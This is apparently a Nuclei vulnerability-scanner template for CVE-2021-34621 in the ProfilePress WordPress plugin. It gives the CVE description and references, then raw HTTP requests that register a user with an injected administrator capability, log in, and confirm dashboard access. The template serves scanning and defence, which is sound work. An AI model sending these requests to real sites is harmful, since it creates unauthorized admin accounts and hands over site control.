id: CVE-2021-34621 info: name: WordPress ProfilePress 3.0.0-3.1.3 - Admin User Creation Weakness author: 0xsapra severity: critical description: ProfilePress WordPress plugin is susceptible to a vulnerability in the user registration component in the ~/src/Classes/RegistrationAuth.php file that makes it possible for users to register on sites as an administrator. impact: | An attacker can exploit this vulnerability to create unauthorized admin accounts and gain full control over the WordPress site. remediation: | Update to the latest version of ProfilePress to fix the admin user creation weakness. reference: - https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin - https://nvd.nist.gov/vuln/detail/CVE-2021-34621 - https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin/ - http://packetstormsecurity.com/files/163973/WordPress-ProfilePress-3.1.3-Privilege-Escalation.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-34621 cwe-id: CWE-306,CWE-269 epss-score: 0.7888 epss-percentile: 0.97984 cpe: cpe:2.3:a:properfraction:profilepress:*:*:*:*:*:wordpress:*:* metadata: max-request: 3 vendor: properfraction product: profilepress framework: wordpress tags: cve2021,cve,wordpress,wp-plugin,packetstorm,intrusive,properfraction http: - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/javascript, */*; q=0.01 Content-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589 Origin: {{BaseURL}} Referer: {{BaseURL}} -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_username" {{randstr}} -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_email" {{randstr}}@interact.sh -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_password" {{randstr}}@interact.sh -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_password_present" true -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_first_name" {{randstr}}@interact.sh -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_last_name" {{randstr}}@interact.sh -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="_wp_http_referer" /wp/?page_id=18 -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="pp_current_url" {{BaseURL}} -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="wp_capabilities[administrator]" 1 -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="signup_form_id" 1 -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="signup_referrer_page" -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="action" pp_ajax_signup -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="melange_id" -----------------------------138742543134772812001999326589-- - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: {{BaseURL}} Referer: {{BaseURL}} log={{randstr}}@interact.sh&pwd={{randstr}}@interact.sh&wp-submit=Log+In - | GET /wp-admin/ HTTP/1.1 Host: {{Hostname}} Accept: */* Connection: close matchers-condition: and matchers: - type: word part: body words: - Welcome to your WordPress Dashboard - type: status status: - 200 # digest: 4a0a00473045022100ada3493f206abd735b16deb87788c4c837ad79b21b18a91eb6c5271f9b2e87620220553d246455cb93e3e3c8c33a06b8ba3a6fdb714db165681c77ed54d827d2aa7f:922c64590222798bb761d5b6d8e72950